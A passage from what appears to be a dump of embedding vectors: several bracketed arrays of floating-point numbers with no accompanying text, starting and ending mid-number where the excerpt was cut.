03268871,0.019486643,-0.010534863,-0.0056136586,-0.008480393,0.0034348902,0.0024542478,0.01999773,-0.019414632,0.003873865,0.020818133,-0.008746476,0.018728701,0.0144603215,-0.013966723,0.0045338124,0.014905297,0.024972513,0.01132945,-0.019529764,0.018603483,0.010141374,0.014310973,0.00701404,-0.012643293,-0.012485224,-0.0027752242,-0.010332875,0.017701145,-0.0076265214,-0.0027933028,0.008847093,0.000929366,-0.0027638518,0.00018397409,-0.0016449026,-0.0004921923,0.013577393,-0.005077214,-0.005847972,-0.016451852,0.013260983,-0.008754405,-0.012549692,-0.006074372,0.015478208,-0.029091537,-0.010663049,0.000903811,0.034875695,-0.003555958,0.037110288,-0.0082082525,0.0042540594,0.02350468,-0.0042655715,-0.024617296,0.0042957976,-0.0050259377,0.0028251486,-0.010541192,-0.016706528,0.011257533,0.013728525,-0.009595531,0.067044996,0.020914052,-0.0070285816,-0.008393304,-0.0049930257,-0.0150721995,-0.01131993,0.00032807252,0.0051233303,-0.0075232494,-0.032797795,-0.021857664,0.00390372,0.018431278,0.00023710703],[0.002641293,0.011309746,0.010960415,-0.021012794,0.0054478324,-0.026231728,-0.0107573215,0.01698133,0.013314485,0.0024294723,0.010326763,0.030557461,-0.010830872,0.01133753,-0.01916369,0.01085228,0.0068795285,-0.014611851,0.008584261,-0.0057940986,0.007029837,-0.02018275,0.003180501,-0.0046226718,0.02639786,0.017114645,0.013238417,-0.011275387,-0.0007632935,0.014906963,-0.009941085,0.01787724,0.011618172,0.0031730775,0.012925401,0.002014894,0.014635587,0.0031543302,0.015825083,0.001149277,-0.00066132116,-0.00021452048,-0.006797457,0.019521328,-0.0124424,-0.016315952,-0.017572688,-0.018925171,-0.03249389,0.0036672412,0.00074192224,-0.00654212,-0.022849232,0.015014889,-0.0030699258,0.008889857,-0.005616079,-0.020323921,0.014203023,0.007892016,-0.019464698,0.017360387,-0.0037688918,0.0039323713,0.026377885,0.010995755,-0.015241437,-0.003692256,-0.008204464,-0.009127143,0.010530786,-0.023349097,-0.023312958,0.0013999448,-0.01684226,-0.0050621554,0.009762764,-0.011636656,-0.020478945,-0.0063518407,-0.016213138,-0.00035666165,0.019148976,-0.0088903,-0.010961587,-0.0057485676,-0.018148487,0.0054045105,-0.00951869,0.00401212,-0.02054499,-0.0017286784,-0.008843627,0.026973357,0.013373587,0.012960281,0.021489268,0.004470321,-0.00761571,0.0005658559,-0.033488292,-0.014146677,-0.016442435,0.0029545666,0.013865947,-0.0043537207,-0.021471297,0.025185859,0.003670136,0.0065389494,-0.015695093,-0.014094402,0.014661767,0.0024312169,-0.009127618,-0.006554737,0.011345438,0.012234716,-0.012804424,0.000117785035,0.0021892916,0.014190184,0.0052700164,0.025533764,-0.0025225743,-0.018719822,0.010819108,0.011464065,-0.005432844,0.0037614289,0.0040460806,0.008549969,-0.0116021205,0.0018116822,0.025937697,-0.009799845,0.00034986684,-0.0010135443,0.01265154,-0.022609271,0.0037114394,0.017243635,0.023167783,-0.0035084798,0.0064184256,0.023587171,0.0011784668,0.019986449,0.023544261,0.009579092,0.014910961,0.02922987,-0.021175953,-0.016773142,0.016598837,-0.0028079466,-0.034324218,-0.019546047,-0.00030671505,0.009290575,-0.010160187,0.008661587,-0.0017288129,0.024288103,0.008264947,-0.007592925,-0.005496601,0.001414288,-0.021113012,0.00012744461,0.0134597095,0.009885847,0.012494265,0.0037959854,-0.009235541,-0.0159014,0.005210654,-0.014131696,-0.004650567,0.016029693,0.017392507,0.004117602,0.024007848,0.0029247538,0.008223963,0.005073207,0.03157263,0.01121437,0.0020794407,-0.010669282,-0.015590572,-0.014620739,-0.0054707592,0.010522093,-0.016443666,-0.028828848,-0.002964507,0.106890164,-0.0062289215,-0.003863382,-0.008878339,-0.011227028,0.0015515445,-0.034648724,-0.0045314915,-0.016674446,-0.02405797,0.0037420923,0.001181544,-0.02120597,0.032985136,-0.0061587756,0.015592607,-0.0023701398,-0.004903699,-0.06827526,-0.00353717,0.030119948,-0.029778799,0.028016012,-0.0055570607,0.003524579,-0.008126659,0.009586085,-0.021629833,-0.008037935,0.023035312,0.0013332273,-0.0075380844,-0.022886906,0.035786618,0.0076624756,-0.04508005,-0.025758326,-0.010064524,-0.013934788,0.0056874654,-0.017643081,0.008494602,0.0038246682,-0.01605839,-0.012547536,0.010980522,-0.0044671893,-0.0047394717,-0.005046394,0.005308963,0.0071212025,0.018862166,-0.0028726999,-0.009188656,0.0009474972,0.011167889,0.03973578,-0.008860074,0.00001439579,-0.0013768133,0.0012540905,-0.006803892,0.018375734,-0.0021836425,0.02929089,-0.0114474315,0.008262506,0.01817966,0.02009975,-0.0020351657,-0.028113421,-0.018308807,-0.037942268,-0.025331635,0.0036581352,0.024650937,0.0011336326,0.0042820647,-0.0003389451,0.013852864,-0.009249035,0.014501264,-0.009553117,-0.006235064,0.009948528,-0.023167217,-0.023991782,-0.019046104,0.00072807074,0.028192382,-0.015046137,0.02722209,0.0092412755,-0.017614538,0.018637901,0.0133536635,-0.0016075651,-0.023532508,-0.010662985,-0.027411014,0.023047363,0.015219613,-0.010154419,0.008699814,0.006719388,0.03321898,-0.0066326666,-0.028250009,-0.0002819545,-0.008113918,0.009780649,0.006660426,0.011971672,-0.02403721,0.014855973,-0.024028651,0.018761495,0.007968062,-0.015672697,0.0061892476,-0.0043836725,0.001207037,-0.010557069,0.014068391,-0.012300545,-0.016114935,-0.012767441,0.003256803,-0.009383142,0.024019547,0.0029827696,0.018071223,0.009727568,0.010709669,-0.005046472,0.01569607,0.020127116,-0.020961536,0.00607719,-0.010858031,0.012151378,0.009362839,0.030966919,-0.0020562718,0.009503854,-0.0029666037,0.016184893,-0.0069804555,0.0067603323,-0.016401593,0.025663627,0.019669812,0.007490366,0.0044080405,0.012645117,-0.02327312,-0.0034919775,0.014888496,-0.0056768535,-0.021229371,-0.014418264,-0.009762747,0.0072792643,0.016196497,-0.015595224,0.038441744,0.01109615,0.06762208,-0.0128247375,-0.016061798,0.006063734,0.012875932,-0.01511489,-0.003938808,0.0031785264,0.0034067824,-0.015242293,-0.012122257,-0.03782297,-0.011333593,0.014086249,-0.0076059117,0.0124548245,-0.02889652,0.0040083453,-0.020286513,-0.017803667,0.0075332467,-0.012415973,-0.027151737,-0.005334051,0.03328624,-0.004028386,-0.015953502,-0.0082594305,-0.014452217,-0.024076475,-0.017744841,-0.01426592,0.0004324052,-0.011296029,-0.0143231405,0.02819682,0.008793011,-0.008113887,0.00940216,-0.010490033,-0.004607418,-0.014539536,-0.014863349,0.0049522035,-0.010148054,0.022474203,0.023598677,0.008187402,-0.025213672,-0.0040332517,0.013243325,0.009069826,-0.007170959,0.017430102,-0.0035797767,0.017756462,0.0036488404,-0.001908082,0.028307049,0.013879066,0.027796363,0.011697754,-0.032501884,0.0042847665,-0.018172663,0.02047027,0.0012514181,-0.000050398245,-0.0029754953,0.014405215,0.0017409038,0.008621098,0.015154148,0.0092935,-0.0042946762,-0.0024030074,-0.015415271,-0.015351691,-0.01839731,0.023750773,0.00089481776,0.021567479,-0.019569583,0.025429662,0.006863239,-0.0046157367,0.004674759,0.007246027,0.010922088,-0.019174365,0.022732258,-0.012580943,0.017330335,-0.016145578,0.02332788,0.00007710924,0.021417864,-0.016715113,-0.005658016,0.012175512,-0.002882889,0.012219271,0.022708066,-0.016477516,0.010281703,0.015143204,0.0011191561,-0.024145892,0.0013981555,0.03767582,-0.023572728,-0.009154541,-0.02513381,-0.00079987413,0.008034879,-0.011191396,0.0018361206,-0.012236083,-0.008450757,0.03168807,0.032086786,0.004539741,0.013803321,-0.006686566,-0.010453302,0.015944753,0.00580085,0.017072102,0.018962506,0.011101175,0.018591683,0.031724185,0.002705042,-0.047844186,-0.0019200759,0.022887938,0.00047979146,-0.015765889,0.041192967,-0.002451011,0.010759787,0.0017856392,-0.0057478943,0.005491673,-0.0062552737,0.033511028,0.03151054,-0.0016230586,0.016144734,-0.0026469994,-0.00964984,-0.012048556,0.01254303,-0.022939727,-0.0057366146,0.0045371186,0.035082284,-0.026364163,-0.009840825,-0.01413278,0.040437497,-0.02353816,-0.0018896259,-0.018370593,-0.0038227115,-0.0055710757,0.00415838,0.088485174,-0.00901352,-0.018939953,-0.016853984,-0.009160606,0.0020011668,-0.023245681,0.0028595785,-0.013372486,0.02398172,0.0035929813,0.009510069,0.006463264,0.004794183,0.004578367,-0.014375887,0.006895357,-0.0005031583,0.0001715425,0.007853424,0.003765065,-0.0015954229,-0.022701373,-0.030499026,-0.01657458,-0.014263452,0.027425827,0.015051071,-0.03538087,-0.0068832785,-0.020082364,-0.0011552786,0.004036326,0.0021210052,0.018377092,-0.001506108,0.012311777,-0.018003637,-0.008005058,0.01115526,0.0038211972,0.0031503786,-0.0069891238,0.030403035,0.00552332,-0.00044978605,-0.018968027,0.010942883,0.009164292,0.009814465,-0.0038241446,0.024289124,-0.008260938,-0.013008003,-0.02305337,-0.0068432475,0.014391339,0.016012993,-0.009864339,0.009977912,0.014671318,0.022108966,-0.016740393,-0.033414457,0.0081366645,0.0021496585,0.0146957375,-0.018155754,-0.0017606512,-0.023374906,-0.0018373912,0.0138938995,0.014107797,-0.014088086,0.0320425,0.016254727,0.0065863603,0.03139774,0.029922968,-0.024446527,-0.007269916,0.012937031,0.004920877,-0.006520913,-0.030448223,-0.0006667852,-0.013045837,0.018270526,0.021658642,-0.015393958,-0.0014082555,0.009979409,-0.0073115244,0.0021897096,0.010753683,0.024755483,-0.028254604,0.0014096486,0.0046637175,0.0026673148,-0.012131248,-0.034327853,-0.023158753,0.023019264,-0.012234346,0.0098864995,0.005455862,-0.012352042,0.022537911,-0.02955786,-0.009864216,-0.060394574,0.015500364,0.010425696,0.010244157,-0.017712308,0.03734389,-0.02125838,0.01285056,-0.012860528,-0.019397039,0.0011070714,0.018137634,0.01651139,0.015362146,0.017868888,0.017209258,-0.013979105,-0.04151837,-0.008904407,-0.053473502,0.021331647,0.038527813,0.0028259135,0.011692817,0.013993846,0.0021582048,-0.022467295,-0.014422903,-0.011177151,-0.01805961,0.0103159165,0.004691273,-0.0009788326,0.0064520733,-0.02502324,0.0042307684,-0.008062898,0.002439616,-0.0040380703,-0.012054699,0.01335447,-0.047525197,0.0002192913,0.0015018347,-0.024878824,0.02369937,-0.015188729,0.008329217,-0.011301841,0.030182756,-0.010865368,-0.017310578,0.0029853797,-0.004551932,-0.008526487,-0.0044087074,-0.0008556357,0.033586334,-0.029880652,0.007314988,0.00113392,0.023272494,0.0044566668,-0.009044596,0.014721792,0.016393963,0.01001945,-0.01024219,-0.0062402585,0.010868343,0.00872811,0.018233586,0.03819109,0.0039329412,0.023003858,0.018988488,0.020103369,0.010489371,-0.008221854,-0.00021002998,-0.0009153003,-0.012639081,-0.019123778,0.022041684,0.021428833,-0.013605487,0.00076634507,0.00017186812,0.014726764,-0.031829048,0.0065984568,-0.006107566,-0.009704701,-0.012896027,0.0024137006,-0.012968292,-0.0037750108,-0.03815174,-0.02873828,0.023340322,0.017384443,0.0018197201,-0.01699819,-0.022560911,-0.016534608,0.008144377,-0.029198853,-0.016873969,-0.020359505,0.032911666,-0.0143138,0.026264157,0.0032126943,0.003305573,0.015299126,0.033963658,-0.012963132,0.014431168,0.0071620303,-0.0045163766,-0.0023182586,0.02228052,0.0033139838,-0.015883252,-0.0076935072,0.013594642,-0.0048398715,-0.016480405,0.0032245542,0.022317288,0.035660595,-0.004650297,-0.022295149,0.0065485127,-0.016124975,-0.0067787897,0.013718703,-0.017190984,-0.009890464,-0.013688284,-0.008625042,-0.01435407,0.026198436,0.0012607551,0.021599075,0.013125204,-0.004667981,0.0038893055,0.018489312,0.0095649725,0.020116495,0.025383245,-0.029086774,-0.02686135,-0.015205684,0.02565761,-0.02113809,0.03132747,0.0027191613,-0.015350605,-0.018624004,-0.021060903,0.0065165623,-0.005383047,0.00932186,0.014380664,-0.036450177,0.036321178,0.000070376605,0.018291358,0.0072519933,-0.0048285187,-0.009101696,0.005208,-0.0026977598,-0.01578018,-0.013966169,0.0031300392,-0.0010893405,-0.017408442,-0.0048296866,-0.032114476,-0.00596128,0.0007280409,-0.017460302,0.0048074136,0.02148118,-0.0018452076,-0.0062260055,0.00041853258,-0.0035280245,0.023931656,0.016952623,-0.026788387,-0.0058859712,-0.0027291959,0.0015906093,0.027300162,0.020669151,-0.023458425,0.038725447,0.0101726465,-0.039400015,0.011183304,0.00031476052,-0.010323289,-0.0006305068,0.0088819545,-0.014059958,-0.008566389,0.019788135,0.002840972,0.0011470866,0.023134213,0.016145151,-0.0044034864,0.010613019,-0.013152146,-0.01635651,-0.0073164795,0.0014959626,-0.01674401,-0.018610373,-0.00071204477,-0.009271099,-0.016677326,0.0022515887,0.02041971,0.0064298497,0.017910253,-0.014469097,0.015615208,-0.0063779587,-0.015710603,-0.017157523,0.0029732306,0.018783607,-0.014507855,-0.010513887,0.008451435,0.0072128717,0.020662326,-0.005800539,-0.0060353526,-0.013953804,-0.011780935,-0.0031551747,-0.011411308,-0.027945025,-0.004552448,-0.009964205,-0.028674047,0.012932132,-0.0023337388,0.007972201,0.00009645253,-0.0082296245,-0.013814535,0.0027080919,-0.035331897,0.020446366,0.008593962,-0.007752733,-0.018765753,-0.008336909,-0.017088426,-0.009510854,0.026908103,-0.009821533,0.035436306,-0.003150155,0.02195503,0.0039760824,0.005868736,-0.014763269,-0.009657605,-0.011063773,-0.01459257,0.029563159,-0.0019267055,0.006792167,0.012867596,0.0073224525,-0.02109073,0.01016611,-0.009094774,-0.014028735,0.007148736,0.0054953564,-0.0112930285,-0.006213411,0.0107997665,0.011640381,0.008107507,0.0065195444,-0.0019996825,-0.06465839,0.0048090513,-0.0120582795,-0.001135802,-0.0020912245,0.0073805214,0.008082419,-0.0043305573,0.023180805,-0.026322164,0.017160239,-0.009469724,-0.011761237,-0.009895149,0.008416558,-0.018828351,-0.017624183,0.01499235,0.026308099,0.009333707,-0.011559705,0.011950263,0.013062391,-0.00026651256,-0.0050067888,-0.009641278,0.0073466715,-0.0044820216,-0.025298862,0.005240906,0.007808107,0.0022126562,0.0032607478,-0.011337064,-0.024533162,-0.013484967,-0.015784945,0.013957671,-0.003998109,-0.0087831635,-0.0035313037,0.006824296,-0.0189021,0.03988487,-0.006964361,0.0020898292,-0.010989481,-0.00027155978,-0.0058277934,-0.02521188,0.02004079,-0.010892083,0.017816963,0.037687756,0.02118788,0.01973496,0.009348998,0.010154664,-0.0058688116,0.0150688095,-0.0018418249,0.001308564,0.00039909015,0.019463602,-0.01632126,-0.02405901,0.0037426976,-0.027658256,0.0052984837,0.0083149355,-0.02234625,-0.016736606,-0.0027035528,-0.005197458,0.0046429,0.025898667,0.008915245,-0.014529685,-0.007194149,0.006656028,0.0057042893,-0.003720117,-0.025423804,0.00507139,0.0015387713,-0.004543297,-0.0008790004,-0.0035615738,-0.014859902,-0.016455954,0.000030458305,0.0075497986,-0.01395036,0.018214228,-0.014564713,0.025531683,0.0078076567,0.027750636,-0.008307473,0.0058180615,0.02561039,-0.0071568494,-0.01864771,0.021978525,-0.010649918,0.00011134202,0.02428287,0.0072080814,0.006289986,0.00094164757,-0.010497595,-0.00035738482,0.00044418982,-0.002706822,-0.0047098394,-0.015508445,0.005630911,0.0042166626,0.058993064,0.0053731315,-0.0062620146,-0.014408037,0.015816225,0.006743653,0.008830444,-0.018085327,0.013528724,-0.0011764199,-0.013670207,0.007867689,-0.012172443,0.02175884,-0.0056851213,-0.0042969664,-0.0012334335,0.0035253915,0.0048221834,-0.00074158906,-0.017054709,0.0042075235,-0.034411285,-0.016645929,-0.017085541,0.005868104,-0.022242885,-0.013802836,-0.0070654615,0.0053348923,-0.0036745544,0.0071186908,-0.008608288,-0.0041439026,-0.009039794,-0.021341521,-0.01441026,0.024493715,0.008894376,-0.016064739,0.006141968,-0.0008359263,-0.029060801,-0.012391568,0.006994489,-0.0014581903,-0.014929874,-0.0009753789,-0.002332657,0.02190483,-0.027568989,-0.009102401,0.015025967,0.00026870845,0.0088163745,0.01401534,0.02430033,-0.001659061,0.025175488,0.004084296,0.0051371553,-0.010838913,0.0104518905,0.023687972,-0.011890364,0.022103729,0.01216407,-0.027486982,-0.0058033136,-0.009761805,-0.03012943,-0.016300365,-0.005290693,0.012431477,0.00205254,0.021468215,-0.005022165,-0.0066954494,0.00444595,-0.0026117635,-0.014831994,0.00016212412,-0.0037577087,0.011528343,-0.0005454099,-0.008349341,-0.034983438,-0.008145372,0.00027873353,-0.015080664,0.010310792,-0.02304808,-0.026269997,-0.0036991898,-0.012524614,0.02023122,-0.017886084,-0.009308623,-0.0045947665,0.018358119,0.023547845,-0.016785782,0.015967792,-0.022782216,0.006284404,0.0054518078,0.017079273,-0.00422135,-0.00042524788,-0.008352105,0.012982452,-0.00009704767,0.036839154,-0.048631925,0.03749014,0.02082034,-0.015365734,-0.0064185616,-0.017159386,0.003712283,-0.015421771,-0.02227524,0.00031489704,0.0031637733,0.0077531445,0.009438799,0.021790942,0.045279365,0.009555375,-0.020030785,0.011563591,0.009192017,0.0030659847,0.003496083,-0.012379616,-0.00861573,-0.040880114,-0.007639031,-0.008326073,-0.023595693,-0.0014801829,-0.009279672,0.002491584,-0.02572025,0.007807986,0.00017288224,-0.0017605814,-0.0035487532,0.03525854,0.016867435,-0.005787426,-0.017470237,-0.0012546288,0.008582316,0.0033694545,-0.022105977,-0.008487393,0.01146624,-0.008583658,0.0084695695,0.0114537915,0.0013273438,0.012380657,0.020470148,0.01447551,-0.037948128,0.0008067942,0.023732657,-0.009519502,-0.029753307,0.01730473,-0.017426353,-0.0044406415,0.0014005703,0.0031221018,0.043824673,0.02868195,-0.006551479,-0.0063955374,0.0076672644,-0.010230268,-0.014684334,0.0053794337,0.008157999,-0.013584666,-0.013134188,-0.017719995,0.0072893873,0.01734586,0.012242781,0.014046746,0.0021732778,-0.00436433,-0.03701389,0.018055664,-0.030338332,0.015055141,-0.0075490903,-0.013738556,0.00019085522,-0.013173271,0.0026354424,0.0008907326,-0.0004518972,-0.0043004225,0.012825661,0.007128478,0.028018385,-0.0005583904,0.018117433,-0.023128044,-0.0026135466,-0.012987864,-0.025702076,-0.006979384,-0.012441594,0.0015029149,0.01331055,-0.00632986,-0.0070802094,-0.0057687624,0.0056804335,0.014509116,-0.03307134,0.07385036,-0.009368937,-0.008116559,-0.0060117594,-0.01874573,0.0039148196,0.010965729,-0.017390326,0.039219894,0.03059978,-0.007993496,0.0010866493,-0.0051265415,0.018902058,0.013083723,0.0019452993,0.010817888,0.010552455,0.011403656,0.012629375,-0.004597308,-0.002227586,0.006970428,-0.012500485,-0.00005565008,-0.014792563,0.024140084,-0.017332466,-0.017327167,0.024421975,0.006955494,-0.029242622,0.00467017,0.00743749,0.014758936,-0.0147806285,-0.015571105,0.0003955477,-0.014443854,-0.023167158,0.025556577,0.011707827,-0.0054614567,0.002681241,0.01859986,0.009875442,0.08598444,0.039987188,0.029015446,0.00273405,0.0095555065,0.015025154,-0.012141553,0.011000858,-0.003349304,0.0038594098,0.0045752623,0.021393493,0.008049123,0.0076880334,0.014219656,-0.000094965595,-0.00073473155,0.0037310803,-0.0019344933,-0.031600207,-0.022092681,0.01844661,0.023242828,-0.014235954,-0.008379075,0.013713575,-0.0023664678,0.008778463,0.008149765,-0.013549234,-0.020526886,-0.021528466,0.026734516,0.027067805,0.013215615,-0.06720045,0.0009979488,0.19148171,0.013508924,-0.0011107858,0.02025861,0.0013924113,-0.0099860355,-0.0629446,0.015753482,-0.023714727,-0.0064126877,-0.014756277,-0.015419675,-0.007249112,0.028673247,0.008299513,0.023733236,0.005358131,-0.045750655,0.010351376,-0.012772747,0.019856455,-0.007161072,0.0059962855,-0.0011819087,-0.048838805,0.0038901325,0.009184394,-0.024385955,-0.016232217,0.023288889,0.0029810756,-0.006857286,0.015754733,0.0013740609,-0.0071931607,0.016172795,0.0078072753,-0.0058559403,0.0032635685,-0.029772274,0.01161129,-0.004511633,-0.003976197,-0.03119558,-0.13119249,0.004210591,0.008835854,-0.024866043,0.018596252,0.0019595558,0.0104438,-0.018866325,0.008385865,-0.018854143,-0.004155427,0.011423312,-0.00075191347,0.015747176,0.0051082815,-0.008296292,-0.0003868055,0.0031219053,0.016432123,-0.0018727505,0.009990081,-0.0032955566,-0.027766548,-0.025075562,-0.014816765,-0.00483027,-0.020505633,0.0047791917,-0.0055034296,-0.0060773976,-0.029217308,0.012911801,-0.004367933,-0.0010589506,-0.024457805,-0.032228168,0.000048044658,0.0005128459,-0.0070535764,0.013842418,0.003352629,-0.019146765,-0.001740165,0.020179003,-0.009413736,0.023827892,-0.0073173787,-0.0020010076,0.0010323887,-0.0008615608,0.033507988,0.0037095253,-0.03847465,0.010388224,-0.010578133,-0.005505711,-0.02350094,-0.012287201,-0.0128034325,0.014083098,-0.0036036961,-0.011647963,-0.0149600115,-0.025992744,0.018082023,-0.030462436,0.01140121,-0.021779293,-0.007590518,0.0003909992,-0.00024865556,0.006539165,0.0031129138,-0.013344952,0.0072870716,0.023808446,-0.01870534,0.016361034,0.017920153,0.004662501,-0.0077251378,-0.025260733,0.0034479604,-0.026804756,-0.016136158,-0.010811936,-0.00423386,-0.003996375,-0.00679768,0.0068503898,0.00037540717,0.017888527,0.03745129,0.03062017,0.0016134935,-0.00616233,0.019428713,-0.007586419,-0.024862802,0.017229725,0.0052392595,-0.006619905,-0.016423589,0.005213362,-0.019780736,0.007216967,-0.02340322,-0.009094342,-0.025145255,-0.0043676887,-0.014357458,0.008327937,0.0076668495,-0.019982766,-0.013969642,-0.038489316,0.019620933,0.0070906365,0.004028387,-0.007531901,-0.026037678,-0.008167921,0.0057485104,0.009221562,0.03799615,0.0022582454,-0.033469193,-0.0031175655,-0.004217322,-0.025941666,-0.0013287822,-0.0061221267,0.00073869905,-0.0036052768,-0.008953314,0.013035561,-0.015491478,-0.021236118,-0.029092263,0.0038348692,0.010906554,-0.011445022,0.008993504,-0.0119691845,0.022398965,-0.003044275,0.014195752,-0.011752693,0.0228469,-0.025995405,-0.0071861423,0.017033625,-0.0019090254,-0.043412328,-0.016712133,0.08587635,-0.025208522,-0.014308035,0.007611314,-0.0054172785,0.032163646,0.021413187,-0.012316256,-0.0142798405,-0.009648038,-0.025618242,-0.009091117,0.00026218718,0.023053724,-0.015806979,0.03487874,-0.008231732,-0.0015644192,-0.015160988,0.010828447,0.009553027,-0.032843262,-0.0025391306,0.0355374,0.014912499,-0.012032544,0.008941459,-0.010296628,-0.0047483435,-0.0064351894,-0.006237579,-0.0020149234,0.0068235314,0.0009381581,0.015476921,-0.03252875,-0.010245947,-0.007094592,0.016404971,-0.00045580574,-0.0046255533,0.0005852558,0.00557828,-0.023355782,0.041975677,0.040572558,-0.024225527,0.017138181,0.0022292635,0.003697404,0.00069629034,0.003275925,0.0014424716,-0.025087424,-0.0034414348,-0.017272351,0.026649242,-0.02166084,-0.010487834,0.0045381086,0.02548501,-0.012581113,-0.010656596,0.0017490747,-0.015071022,0.016311722,-0.0014552434,-0.011713694,0.0029454955,0.03895378,-0.008972306,0.0026743715,-0.0036312535,0.028152509,-0.024247983,0.0055164946,-0.021147579,-0.0034213257,-0.026886601,-0.009004861,0.013655182,0.0037040168,0.000656121,0.015110424,-0.012336923,-0.059737504,-0.0046835444,-0.0052052108,-0.036824256,0.015043253,0.006022681,0.012461437,0.061430674,-0.0019024241,0.003643331,-0.017407857,-0.0043924754,0.00021520276,-0.0022850842,0.008446011,0.029544234,-0.0074243248,-0.0038445073,-0.006341063,-0.0054620896,-0.037188083,-0.0032561796,-0.0028088791,0.0011668748,-0.031017631,0.011259145,-0.012463566,0.01189014,-0.016598042,-0.011550877,0.049491465,-0.015632663,-0.0046564047,0.002190461,-0.014786211,-0.00721699,-0.017494977,-0.0006818443,0.0066406894,0.046970356,-0.006729219,-0.011568546,0.024280418,-0.029137833,-0.0029723947,-0.0079371445,0.04108721,-0.0088046,0.0015818208,-0.008875504,0.0038447778,0.017350273,0.024540985,0.016150666,0.0035930125,-0.0021965404,-0.0028932544,-0.013189835,0.000984175,-0.002916508,-0.008793994,0.007947735,0.0039299037,-0.022155503,0.0142411,0.01447791,-0.00016349042,-0.010927295,-0.009298872,0.0046710637,0.011501826,-0.019346777,-0.0025550902,-0.009957825,-0.016948573,-0.0079419315,0.038594417,0.0032245107,-0.01570651,-0.023686215,0.014231653,0.021898953,-0.01738879,0.012898019,0.00015975958,-0.022538388,0.00050764706,-0.001061213,0.008028944,0.017809497,0.009940231,-0.005710746,-0.014524643,-0.024791151,0.011721594,0.010801346,0.019481542,-0.035742067,0.00075715414,0.012948315,-0.00033912074,-0.005455377,0.012177278,-0.014767817,-0.00934117,-0.0063850773,0.011868563,0.0017592402,-0.020941492,-0.008040227,0.019388577,0.016279597,-0.014594902,0.009570628,0.011058689,-0.017070124,0.029714948,-0.020423748,-0.010829535,0.0023388648,-0.00018539141,-0.009967257,-0.005619084,-0.018615764,-0.003634716,-0.033238426,0.031438243,-0.005555611,-0.025621273,0.0037142849,-0.011330949,-0.010542161,0.006803463,0.0019689878,0.0032121383,0.0070161847,0.0003768179,-0.007146439,0.00958113,-0.041932773,-0.019583972,-0.029918501,0.06321692,-0.0045560044,-0.021654721,0.009480295,0.022071825,0.020244144,-0.019703895,0.0046034027,-0.01609755,-0.019067226,-0.013242476,-0.047709666,-0.020525984,-0.0038771352,-0.005733645,-0.03506297,0.0022014212,0.0068472466,-0.017373027,0.011658373,-0.0014203592,-0.0079477765,-0.0014229675,-0.0062555084,-0.009000035,-0.012923899,-0.004109403,0.0022441742,-0.024510777,0.011992717,0.00469469,-0.012822884,-0.00167936,-0.014260816,-0.008273117,0.0021507067,-0.012238392,-0.011309871,0.0109544,0.004813335,0.0059076906,0.0076787993,-0.009712226,-0.032621354,-0.01565512,-0.0033535575,0.024279285,0.002763503,-0.014699789,0.003741568,-0.009827646,0.022758244,0.015224016,-0.020222694,0.015030397,0.02400466,0.010233331,-0.032671023,0.029276839,0.013127693,0.0070343358,-0.030873192,-0.029172914,-0.013231451,0.013578591,0.018344263,-0.012684766,-0.025031952,-0.005688942,0.0011631799,-0.037228096,0.044974737,0.01197991,0.004627227,0.0045609684,-0.021386698,0.011363026,-0.015821487,0.023179872,0.012412009,0.003203454,0.01649352,-0.016015422,-0.010233785,-0.006518231,0.019818394,-0.025100345,-0.0022067542,0.010488451,0.017315393,0.001998363,0.004114023,-0.025746476,-0.015354563,0.0008631326,-0.0028728682,0.003636072,0.0010836633,0.0044697686,-0.022670079,0.00071871415,-0.0027109317,0.013170646,0.012188902,-0.0007035024,-0.020048253,-0.07819173,0.01832866,-0.009580622,-0.00293392,0.003781748,-0.0018450988,0.025095802,0.06549112,-0.008705988,-0.035365246,0.004379731,0.012787045,-0.0029993374,0.019864827,0.018126147,0.011593312,-0.004708331,-0.0076848962,-0.010896475,0.005210056,0.013818262,-0.008463094,-0.0060879784,-0.0107031455,0.0041916077,0.017580695,-0.012372984,0.0022074536,0.037288006,0.017779872,-0.0035579894,0.011248384,0.0060978783,0.0028850003,-0.006446281,0.014994913,-0.017663943,0.00089316204,0.018243378,0.012782695,0.00024212727,-0.006139627,-0.020819005,0.0071941568,-0.00051162427,0.018441793,0.023596039,-0.0016852195,0.01576664,0.015525524,-0.0031775916,-0.028412428,0.01562633,0.013561667,-0.005824768,-0.01617272,-0.022690482,0.015793279,0.015912833,-0.00634964,0.005765928,0.031926006,0.003265133,-0.006764246,-0.00022308982,0.024252404,0.009236969,-0.015606484,0.00647028,-0.009761562,-0.023445716,-0.0026002955,-0.013350184,0.011724654,-0.02098651,0.0068255416,0.012895991,-0.010501173,0.017901206,0.025827581,-0.007972746,-0.0024962442,-0.005948778,0.0069655473,-0.00037592108,0.0030045172,0.007118196,-0.0024434326,-0.034042828,-0.016005944,0.0031707352,-0.0009603775,-0.03041811,-0.025800288,-0.00069351203,0.0032386202,0.0016619582,0.023602152,0.019040946,0.014503656,0.012098383,-0.005426518,-0.018304333,-0.008435354,-0.09720546,-0.014606386,0.021334264,0.01302918,-0.019676525,-0.021463195,-0.010184456,-0.00727196,0.029076604,-0.010878687,-0.0035015163,-0.00965034,0.04023496,-0.00083922036,-0.0016064601,0.004581406,-0.022738962,-0.0076541253,0.011759115,-0.008983584,0.01749894,-0.023926573,-0.03768022,-0.005342498,0.002234775,-0.01408636,-0.00049397396,0.0002390993,0.019857196,-0.020784894,-0.0055620894,-0.0053257537,-0.020083293,-0.005069644,-0.0021709318,-0.03428334,0.008273646,0.011273872,0.0018382769,-0.00020266387,0.016064446,-0.014307241,0.006816138,0.007963449,-0.0140075525,0.011286714,0.0053693624,0.0120788375,0.030396521,0.0040894835,-0.02816457,0.011694727,-0.012414694,0.001825088,-0.014966951,-0.013665146,0.007061568,0.013568125,-0.0040794215,0.02326385,-0.011544876,0.0034451203,-0.023176841,-0.019247187,-0.012331038,0.026935006,-0.019919658,-0.0128600225,0.024115756,-0.006224226,-0.0041520167,0.019059502,0.03503854,-0.0019236879,0.0039867247,0.03292009,0.00613324,0.036686487,0.01164502,-0.011348327,0.002259108,-0.0043293927,-0.021903548,0.029755034,-0.0053246585,0.0065755,0.0054640057,0.026503205,-0.017146047,0.035005216,0.0017440083,0.031785764,-0.009019535,0.007266398,0.034741867,0.010488804,0.012710445,-0.0073400843,-0.0048230444,-0.008325424,-0.035908252,-0.0027172694,-0.022162603,0.010586166,-0.008003468,-0.0072118165,-0.017161291,-0.013445792,-0.007357042,0.0070105544,0.007861266,-0.010688044,-0.031597514,0.023533389,0.0016194024,-0.0038701468,0.003011209,0.00090499537,-0.0070940997,0.011309751,-0.0097725345,0.0038426865,0.0055395053,0.00023130342,-0.029557604,0.004049674,-0.0038894392,0.012939505,-0.0075142058,-0.009314346,0.00211